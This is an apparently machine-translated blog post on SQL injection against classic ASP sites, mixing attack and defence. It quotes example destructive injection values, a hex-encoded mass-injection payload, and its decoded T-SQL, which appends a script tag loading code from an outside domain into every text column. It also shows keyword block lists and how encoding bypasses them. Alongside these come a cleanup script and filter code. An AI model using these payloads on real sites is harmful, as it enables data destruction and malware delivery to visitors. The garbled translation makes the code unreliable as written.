SQL injection attacks using binary code

-- Update 01/03 am --
I found that the Code is not surprising, but I just want to stir up the cold meal a few years ago. Because years have passed, some people may be negligent and try some others.
In the injection mode, numeric fields are the easiest to enter. text, but the querystring text is not as many as numbers.
The most common is news. asp? Id = 3
In ASP, the neglected statement is as follows:
Aspid = request ("ID ")
SQL = "select * from news where id =" & aspid
Set rs = conn. Exec (SQL)
The ID here is completely unprotected. If the ID is a string, it is easy to inject
For example, id = 3; Delete % 20 from % 20 news;
Directly Delete news table records
For text, such as news. asp? Keyword = ABC
Aspkeyword = request ("keyword ")
SQL = "select * from news where title like '%" & aspkeyword & "%'
The injection is used in keyword and enclosed in single quotes. Finally, a false SQL statement is written to cheat the original code.
For example, keyword = abc'; delete from news; select * From sysobject where something like '%
It is much more troublesome than ID.
 
A lot of code in the following content is actually used to avoid some key words restricted by the anti-injection program.
I have read several anti-injection programs, usually through filtering methods, such
SQL _injdata =
"'| And | exec | insert | select | Delete | update | count | * | % | CHR | mid | master | truncate | char | declare | daxia123 | <SCRIPT |/script >"
SQL _inj = Split (SQL _injdata, "| ")
If the following binary code is used and the size of the mixed write code is used, the above program can be bypassed.
Therefore, we still need to strictly judge whether the source is querystring or form, whether it is a number or text.
If the number is required, use the isnumeric () function to check if the number is not specified.
For text, check whether there are single quotes. If there is one, use two single quotes instead. In ASP, the first one of the two single quotes is used as an escape.

I just saw a bunch of code in the following articles being broken down. The actual analysis is still based on the previous principles, so the blocking method has not changed.

-- The following content comes from --

Http://bbs.360safe.com/viewthread.php? Tid = 606369
Http://blog.csdn.net/songz210/archive/2009/01/01/3663861.aspx
Http://bbs.ikaka.com/showtopic-8580913-5.aspx

Source code for Injection Attack interception:

Declare % 20 @ s % 20 varchar (4000) % 20 set % 20 @ s = cast (Bytes % 20as % 20 varchar (4000); Exec (@ s)

 

Source code Translation

Declare @ t varchar (255), @ C varchar (255)
Declare table_cursor
Cursor for select a. Name, B. name from sysobjects A, syscolumns B where
A. ID = B. ID and A. xtype = 'U' and (B. xtype = 99 or B. xtype = 35 or B. xtype = 231
Or B. xtype = 167)
Open table_cursor fetch next from table_cursor into @ T, @ C while (@ fetch_status = 0)
Begin
Exec ('Update ['+ @ T +'] Set
['+ @ C +'] = rtrim (convert (varchar (4000), ['+ @ C +']) + ''<script
Src = http://cn.jxmmtv.com/cn.js> </SCRIPT> ''')
Fetch next from table_cursor into @ T, @ C end close table_cursor deallocate table_cursor

 

Fix code by float cloud @ http://bbs.ikaka.com/showtopic-8580913-4.aspx#9261365

Note: ntext and text are invalid.

/*********** Define the characters to be removed. Note that,

There may be more than one, so my server will find two ************/
Declare @ delstr nvarchar (500)
Set @ delstr = '<SCRIPT src = http://cn.inputthedamnwebsitedomainhere.cn/cn. JS> </SCRIPT>'
/***************************** ***********/

************/
Set nocount on

Declare @ tablename nvarchar (100), @ columnname nvarchar (100), @ tbid
Int, @ irow int, @ iresult int
Declare @ SQL nvarchar (500)

Set @ iresult = 0
Declare cur cursor
Select name, ID from sysobjects where xtype = 'U'

Open cur
Fetch next from cur into @ tablename, @ tbid

While @ fetch_status = 0
Begin
Declare cur1 cursor
-- Xtype in (231,167,239,175) is of the char, varchar, nchar, and nvarchar types.
Select name from syscolumns where xtype in (231,167,239,175)
And Id = @ tbid
Open cur1
Fetch next from cur1 into @ columnname
While @ fetch_status = 0
Begin
Set @ SQL = 'Update ['+ @ tablename +'] Set ['+ @ columnname +'] =
Replace (['+ @ columnname +'], ''' +@ Delstr + ''', ''') Where
['+ @ Columnname +'] Like ''' % '+ @ delstr +' % '''
Exec sp_executesql @ SQL
Set @ irow = @ rowcount
Set @ iresult = @ iresult + @ irow
If @ irow> 0
Begin
Print 'table: '+ @ tablename +', column: '+ @ columnname + 'has been
Updated with '+ convert (varchar (10), @ irow) + 'record (s );'
End
Fetch next from cur1 into @ columnname

End
Close cur1
Deallocate cur1

Fetch next from cur into @ tablename, @ tbid
End
Print 'the database has' + convert (varchar (10 ),@Iresult) + 'record (s)
Been updated .'

Close cur
Deallocate cur
Set nocount off
/***** The above is the operating entity ******/

Related suggestions by xutingxin
@ Http://bbs.ikaka.com/showtopic-8580913-5.aspx#9261798
Solution: 1. Strictly filter the content obtained by request. Form and request. querystring.
Request ("name") is used to obtain the value. Do not use cookies to store the content in SQL statements to query the database. 2
Important user data should be verified by session whenever possible. Because session is a server end, the client cannot forge data unless it has the permissions of your server.

You can use the following code to prevent get, post, and cookie injection to filter SQL injection attacks:

<%
Response. Buffer = true' cache page
'Prevent get Injection
If request. querystring <> "then stopinjection (request. querystring)
'Prevents post injection
If request. Form <> "" Then stopinjection (request. Form)
'Prevent cookie Injection
If request. Cookies <> "" Then stopinjection (request. Cookies)
'Regularized subfunctions
Function stopinjection (values)
Dim RegEx
Set RegEx = new Regexp
RegEx. ignorecase = true
RegEx. Global = true
 
RegEx. pattern =
"'|; | # | ([/S/B + ()] + ([email = select % 7 cupdate % 7 cinsert % 7 cdelete % 7 cdeclare % 7C @ % 7 cexec % 7 cdbcc % 7 calter % 7 cdrop % 7 ccreate % 7 cbackup % 7cif % 7 celse % 7 Cend % 7 cand % 7cor % 7 CADD % 7 cset % 7 Copen % 7 cClose % 7 Cuse % 7 cbegin % 7 cretun % 7cas % 7cgo % 7 cexists) [/S/B] Select | update | insert | Delete | declare | @ | exec | DBCC | alter | drop | create | Backup | if | else | End | and | or | add | set | open | close | use | begin | retun | as | go | exists) [/S/B [/Email] +] *)"
Dim sitem, svalue
For each sitem in values
Svalue = values (sitem)
If RegEx. Test (svalue) then
Response. Write "<script language = JavaScript> alert ('invalid injection! Your behavior has been recorded !! '); History. Back (-1); </SCRIPT>"
Response. End
End if
Next
Set RegEx = nothing
End Function
%>

Save the above Code as a file, such as antisql. asp, and include this file at the beginning of the database connection file <! -- # Include file = "antisql. asp" --> to prevent SQL injection attacks.